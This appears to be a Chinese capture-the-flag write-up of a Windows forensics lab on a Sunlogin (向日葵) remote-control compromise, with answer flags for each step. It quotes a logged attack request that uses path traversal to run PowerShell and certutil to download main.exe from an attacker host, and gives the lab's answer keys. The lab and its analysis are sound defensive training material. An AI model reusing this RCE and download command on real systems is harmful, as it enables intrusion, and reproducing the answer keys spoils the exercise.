当前位置: 首页 > news >正文

第四章 windows实战-向日葵

第四章 windows实战-向日葵

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);

翻阅日志的时候发现了在3月21日的时候黑客就已经开始发起进攻了但是一直没有成功

image-20251020165444537

直到在3月26日的时候黑客执行了ping命令和whoami的操作,这些操作是黑客首次上线会执行的操作之一确定自己是什么用户权限等

image-20251020170019750

flag{2024-03-26 10:16:25.585}

2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

从上一题可以知道黑客连接的ip为

flag{192.168.31.45}

3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

继续翻阅日志在下面发现了一个exe执行程序

image-20251020170240608

[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, 
path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, 
version: HTTP/1.1

二、逐部分解析

关键字段 说明
192.168.31.45:49329 攻击者的来源IP和端口(客户端发起连接)
/check?cmd=... 访问的路径;?cmd= 表明目标Web服务可能有命令执行功能(例如一个远程控制或监控接口)
%2F URL编码的/,表示攻击者在尝试目录穿越(Path Traversal)../../../../ 让命令越过应用目录,进入系统路径。
windows/system32/WindowsPowerShell/v1.0/powershell.exe 攻击者调用系统的 PowerShell。说明服务程序已经执行了外部命令(RCE成立)。
certutil -urlcache -split -f http://192.168.31.249/main.exe 这是 下载恶意文件的命令:使用 Windows 内置的 certutil 工具下载远程木马 main.exe。这也是一个典型的“利用系统自带工具绕过防护”的方式。
192.168.31.249 被控机器要去下载的木马服务器(黑客控制端 IP)
plugin:check, session:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1 说明服务端接受了请求并分配了一个会话ID(session)。这意味着命令被正常解析执行。
flag{192.168.31.249}

4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

继续翻阅日志在下面发现了一个qq号

image-20251020171256162

QQ搜索一下发现了一个群聊

image-20251020171343067

image-20251020171431231

image-20251020171611262

拿到密码题目要求我们进行md5加密

image-20251020171704546

flag{5ad8d202f80202f6d31e077fc9b0fc6b}

5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

打开桌面上的 baoleiji.txt文件

image-20251020174020465

image-20251020174043752

和.DEC文件复制到一个txt里面

image-20251020174110900

拿去网站进行 rsa解密 https://try8.cn/tool/cipher/rsa

NXVJSTQUAPGTXKSX

image-20251020174605360

再拿去RSA解密

解密得到flag,iv偏移量是16个0;

image-20251020174645463

@suanve
时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}

也是很励志了

http://www.jsqmd.com/news/19530/

相关文章:

  • 轻量服务器Lighthouse + 1Panel + Halo,三步打造你的专属网站
  • 第四章 windows实战-emlog
  • Docling + LangChain + RAG 构建智能文档问答系统
  • 企业公用电脑登录安全管控的终极方案:ASP操作系统安全登录管控方案 - 详解
  • 完整教程:【Linux】基础知识与操作汇总:一份给新手的 Linux 学习总结
  • 第四章 windows实战-wordpress
  • 2025 年固化剂生产厂家最新推荐排行榜:聚焦国内优质厂商,助力选购高性价比混凝土及厂房用固化剂
  • 2025 年锂基固化剂生产厂家最新推荐榜单:聚焦优质企业,助力客户精准选品,解决行业选品难题锂基密封/锂基混凝土/厂房锂基固化剂公司推荐
  • 广义串并联图
  • 详细介绍:【超全】基于Springboot的海鲜销售管理系统【包括源码+文档+调试】
  • 完整教程:PostgreSQL 中序列(Sequence)的详细用法
  • 第八章 内存马分析-java02-shiro
  • 第八章 内存马分析-java01-nacos
  • 2025 种植棚/养殖棚/工程/羊肚菌/保温/园林/加厚/绿化/草苫子推荐榜:济宁泽萌草制品 5 星领跑,适配大棚 / 混凝土 / 园艺多场景需求
  • 2025 打捆机捆/包装/绕树干/草绳推荐榜:济宁泽萌草制品 5 星领跑,适配农业 / 园艺 / 建筑 / 物流捆扎需求
  • AI不是魔法,而是算力+算法+数据的平衡艺术!
  • 雪碧图动画实例 - 教程
  • 遇到一例无法保存编辑后的 Excel 文件的问题
  • 告别难找的本地搜图工具!ImageSearch 2.2 携全新 2.0UI 登场
  • 完整教程:【Python】文件处理
  • 2025/10/22
  • 2025/10/21
  • 2025/10/21
  • 23423
  • 从“看得见”到“看得懂”:国标GB28181算法算力平台EasyGBS与AI算法仓的智能视界革新
  • 从“看得见”到“看得懂”:国标GB28181算法算力平台EasyGBS与AI算法仓的智能视界革新
  • 生产力小帮手:高效搞定数据分析与自动化操作
  • [ACTF2020 新生赛]Exec 1
  • 2025 年钢管厂家最新推荐榜:覆盖精密钢管、汽车钢管、高强钢钢管等品类,为下游采购企业提供权威选品参考
  • 2025 年焊管源头厂家最新推荐榜单:盘点高性能焊管制造企业,助力下游企业精准选品家具/汽车/高精度内刮/镀铝/不锈钢/高强钢焊管厂家推荐